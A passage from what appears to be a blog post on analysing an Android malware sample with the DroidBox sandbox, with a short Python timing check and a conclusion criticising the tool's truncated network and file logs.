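    min(abs(to_seconds(c) - to_seconds(n)) for n in net_open_events)
    for c in crypto_events
]
print(gaps)  # [1, 0, 0, 0]
```

Every Blowfish operation happens within one second of a connection being opened. That supports the observation, although with timestamps rounded to whole seconds it says nothing about the exact order within a second.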

Conclusion

I think DroidBox is a very good tool for dealing with Android APKs and analyzing their behaviour at run-time. It comes with a working mobile sandbox meant to inspect and monitor an application’s activities. However, during my analysis I had to rely on previous analyses since the results didn’t contain the full details. Neither the network traffic nor the contents read from files were complete. In order to fully understand a piece of malware I need complete details about its behaviour. For example, I got the following response from the server, which is completely useless in this form:

HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:29:38 GMT\r\nServer: Apache\r\nContent-...

Besides that, I was indeed able to see that the application reads from some file. But the delivered content was once again stripped:

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...

I hope the developers will see this as a vital necessity and update DroidBox as soon as possible. Furthermore, I look forward to other mobile sandboxes that have data instrumentation capabilities. Next time I’ll have a deeper look at Android’s DDMS.